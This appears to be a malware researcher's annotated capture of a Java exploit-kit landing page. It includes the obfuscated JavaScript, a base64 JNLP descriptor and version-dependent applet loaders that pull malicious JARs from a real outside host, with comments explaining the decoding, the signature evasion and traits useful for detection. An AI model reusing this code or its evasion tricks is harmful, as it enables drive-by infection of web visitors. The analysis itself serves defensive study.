- // #MalwareMustDie!
- // JNLP exploit kit landing page. It works in two steps:
- // a cookie check, then a Java applet chosen according to your Java version
- // Case: http://www.urlquery.net/report.php?id=4016167
- // Glazunov(? how to write this name?) EK
- // @unixfreaxjp:
- // This part is cookie setups...
- //
- var ws=newDate();
- ws.setDate(15+ws.getDate());
- document.cookie="stats=446501053769c06c565094b26d26e8ef;
- path=/;
- expires="+
- // @unixfreaxjp: Assemble...
- ws.toGMTString();
- // @unixfreaxjp: WTF is this?
- // kvqzu is 24 decimal digits of padding followed by a base64 blob.
- // Further down the page passes kvqzu.substr(24) (padding stripped) as the
- // value of the applet's "jnlp_embedded" parameter, so decode from offset 24.
- kvqzu="963372952943740529293246PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9Im1ubXpqY3Euam5scCIgc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9qYXZhZnguY29tIj4NCiAgPGluZm9ybWF0aW9uPg0KICAgIDx0aXRsZT5uOUc4VFpLUlZOUDJ4bnhVNDFmck91d0tBVThZeDwvdGl0bGU+DQogICAgPHZlbmRvcj52VXVvN1RvYzlldlR4Z1A1ZU05SzVSQjwvdmVuZG9yPg0KICA8L2luZm9ybWF0aW9uPg0KICAgPHJlc291cmNlcz4NCiAgICAgICAgPGoyc2UgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIgdmVyc2lvbj0iMS43KyIgLz4NCiAgICAgICAgPGphciBocmVmPSJodHRwOi8vMjEyLjEyNC4xMTUuMTk0LXN0YXRpYy5yZXZlcnNlLnNvZnRsYXllci5jb206ODA4MC8yNTEyMDI4MTI2LzU0MTEuemlwIiBtYWluPSJ0cnVlIiAvPg0KICA8L3Jlc291cmNlcz4NCiAgPGFwcGxldC1kZXNjIG1haW4tY2xhc3M9IndlcHRibGtsYWFkcC5mcXZoc3dsdmhsc2poc3JxYWJhdS5jbGFzcyIgbmFtZT0iNmhjNGhrdXpxMGQxeSIgaGVpZ2h0PSIxMCIgd2lkdGg9IjEwIj4NCiAgICAgPHBhcmFtIG5hbWU9Il9fYXBwbGV0X3Nzdl92YWxpZGF0ZWQiIHZhbHVlPSJ0cnVlIiAvPg0KICA8L2FwcGxldC1kZXNjPg0KPC9qbmxwPg==";
- // @unixfreaxjp:
- // See that long string above? It is base64;
- // decoded, it is the JNLP descriptor that gets loaded.
- // (Decoding the whole string, 24-digit prefix included, yields a few
- // unreadable bytes in front of "<?xml"; they are not part of the JNLP.)
- //
- // <?xml version="1.0" encoding="utf-8"?>
- // <jnlp href="mnmzjcq.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">
- // <information>
- // <title>n9G8TZKRVNP2xnxU41frOuwKAU8Yx</title>
- // <vendor>vUuo7Toc9evTxgP5eM9K5RB</vendor>
- // </information>
- // <resources>
- // <j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />
- // <jar href="http://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/5411.zip"
- // main="true" />
- // NOTE(review): the decode above stopped at the <jar> element. The rest of the blob decodes to:
- // </resources>
- // <applet-desc main-class="weptblklaadp.fqvhswlvhlsjhsrqabau.class" name="6hc4hkuzq0d1y" height="10" width="10">
- // <param name="__applet_ssv_validated" value="true" />
- // </applet-desc>
- // </jnlp>
- // For detection: the descriptor is only visible after base64-decoding the jnlp_embedded value,
- // so content inspection has to decode it before matching. The random-looking title/vendor,
- // the 10x10 applet and the page-supplied "__applet_ssv_validated" parameter are the notable
- // traits; the last one is commonly read as an attempt to skip the Java security prompt
- // (hedged - this page does not show the JAR's behaviour).
- //@unixfreaxjp
- // lock and load...
- // Helper strings used later when the applet/object markup is assembled:
- //   pnmoy   - "jnlp_" prefix, concatenated into the parameter names "jnlp_href" and "jnlp_embedded"
- //   uiukv   - hex string passed as the "hkqrceetlsgftlrdvk" parameter in the Java 7 branch
- //   aufazh  - hex string passed as the same parameter in the non-Java-7 branch;
- //             identical to uiukv except for two bytes near the end
- // NOTE(review): the meaning of the two hex strings is not shown on this page; presumably
- // encoded configuration read by the applet - confirm by analysing the JAR.
- pnmoy="jnlp_";uiukv="32584948301f0d71731c7b5a2f032505114c702226504c5d7d7a1b544b415070213a4c2163107f76036547267d4671196c694761394062653d03050e0b0b";aufazh="32584948301f0d71731c7b5a2f032505114c702226504c5d7d7a1b544b415070213a4c2163107f76036547267d4671196c694761394062653d00050e0a0b";
- // plugin name handed to PluginDetect.getVersion() below
- dwssn='Java';
- // "value" and "param" are kept in variables so the literal text "<param ... value=" never
- // appears in the page source; presumably to defeat simple string signatures.
- ijjfxi='value';
- uybdzqp='param';
- // @unixfreaxjp:
- // Depends on your Java version.. one of two applets is served to you....
- // You'll go to the URL below... for Java ver 7 OR....
- // NOTE(review): as written, the <script src=...> below is emitted for every visitor; the
- // Java-version branch is in the next <script> block. The leading "ftp" in cfvxj is junk
- // that substr(3) strips, leaving the http:// URL ending in /929. Because the next block
- // calls PluginDetect, /929 presumably serves that library - not confirmed from this page.
- cfvxj="ftphttp://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/929";
- // The document.write string is split over several lines by the paste; kept as captured.
- document.write("
- <script
- src='"+cfvxj.substr(3)+"'>
- <\/script>");</script>
- // Or else you go to the URL down below...
- // Version branch. PluginDetect.getVersion('Java') returns a comma-separated version string;
- // v[1] is its second field and is compared loosely (==) with 7.
- //   v[1] == 7 : an <applet> is written with jnlp_href="mnmzjcq.jnlp" and jnlp_embedded set to
- //               kvqzu.substr(24), i.e. the base64 JNLP defined earlier in the page (its jar is
- //               .../5411.zip), plus the "hkqrceetlsgftlrdvk" parameter carrying uiukv.
- //   otherwise : an <object type="application/x-java-applet"> is written that loads
- //               weptblklaadp.nfpmuqaplgapmsrrmnranye.class from .../4.zip, with the same
- //               parameter carrying aufazh.
- // Both elements are 10x10. For detection, the two archive paths, the fixed parameter name and
- // the class names are the stable strings in this sample; the markup itself only exists after
- // the string concatenation runs, so static matching on "<param" in the raw page will miss it.
- <script>
- var v = PluginDetect.getVersion(dwssn).split(',');
- if (v[1] == 7) {
- document.write('<applet height="10" width="10"><' + uybdzqp + ' name="' + pnmoy + 'href" ' + ijjfxi + '="mnmzjcq.jnlp" /><' + uybdzqp + ' name="' + pnmoy + 'embedded" ' + ijjfxi + '="' + kvqzu.substr(24) + '" /><' + uybdzqp + ' name="hkqrceetlsgftlrdvk" ' + ijjfxi + '="' + uiukv + '" /></applet>');
- } else {
- document.write('<object type="application/x-java-applet" name="qwakjb" width="10" height="10"><' + uybdzqp + ' name="code" ' + ijjfxi + '="weptblklaadp.nfpmuqaplgapmsrrmnranye.class" /><' + uybdzqp + ' name="archive" ' + ijjfxi + '="http://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/4.zip" /><' + uybdzqp + ' name="hkqrceetlsgftlrdvk" ' + ijjfxi + '="' + aufazh + '" /></object>');
- }
- ---
- #MalwareMustDie!!